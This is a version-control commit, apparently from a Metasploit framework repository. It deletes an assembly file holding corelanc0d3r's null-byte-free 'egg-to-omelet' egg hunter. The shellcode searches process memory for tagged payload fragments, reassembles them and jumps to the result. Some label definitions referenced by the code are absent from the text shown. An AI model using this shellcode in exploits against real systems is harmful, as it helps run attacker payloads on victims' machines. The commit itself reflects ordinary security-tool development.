remove asm file now that the assembly is inlined in the class
git-svn-id: file:///home/svn/framework3/trunk@10120 4d416f70-5f16-0410-b530-b9f4589650daunstable
@ -1,100 +0,0 @@
;corelanc0d3r - egg-to-omelet hunter - null byte free
nr_eggs equ 0x2 ;number of eggs
egg_size equ 0x7b ;123 bytes of payload per egg
jmp short start
;routine to calculate the target location
;for writing recombined shellcode (omelet)
;I'll use EDI as target location
;First, I'll make EDI point to end of stack
;and I'll put the number of shellcode eggs in eax
;get stack pointer and put it in EDI
push esp
pop edi
;set EDI to end of stack
or di,0xffff ;edi=0x....ffff = end of current stack frame
mov edx,edi ;use edx as start location for the search
xor eax,eax ;zero eax
mov al,nr_eggs ;put number of eggs in eax
xor esi,esi ;use esi as counter to step back
mov si,0-egg_size+20 ;add 20 bytes of extra space, per egg
get_target_loc_loop: ;start loop
dec edi ;step back
inc esi ;and update ESI counter
cmp si,-1 ;continue to step back until ESI = -1
jnz get_target_loc_loop
dec eax ;loop again if we did not take all pieces
;into account yet
jnz calc_target_loc
;edi now contains target location for recombined shellcode
xor ebx,ebx ;put loop counter in ebx
mov bl,nr_eggs+1
call get_target_loc ;jump to routine which will calculate shellcode
;target address
;start looking, using edx as basepointer
jmp short search_next_address
dec edx ;scasd does edx+4, so dec edx 4 times + inc edx one time
; to make sure we don't miss any pointers
dec edx
dec edx
dec edx
inc edx ;next one
push edx ;save edx
push byte +0x02
pop eax ;set eax to 0x02
int 0x2e
cmp al,0x5 ;address readable ?
pop edx ;restore edx
je search_next_address ;if address is not readable, go to next address
mov eax,0x77303001 ;if address is readable, prepare tag in eax
add eax,ebx ;add offset (ebx contains egg counter, remember ?)
xchg edi,edx ;switch edx/edi
scasd ;edi points to the tag ?
xchg edi,edx ;switch edx/edi back
jnz find_egg ;if tag was not found, go to next address
;found the tag at edx
;ecx must first be set to egg_size (used by rep instruction)
;and esi as source
mov esi,edx ;set ESI = EDX (needed for rep instruction)
xor ecx,ecx
mov cl,egg_size ;set copy counter
rep movsb ;copy egg from ESI to EDI
dec ebx ;decrement egg
cmp bl,1 ;found all eggs ?
jnz find_egg ;no = look for next egg
; done - all eggs have been found and copied
call get_target_loc ; re-calculate location where recombined shellcode is placed
jmp edi ; and jump to it :)
Reference in New Issue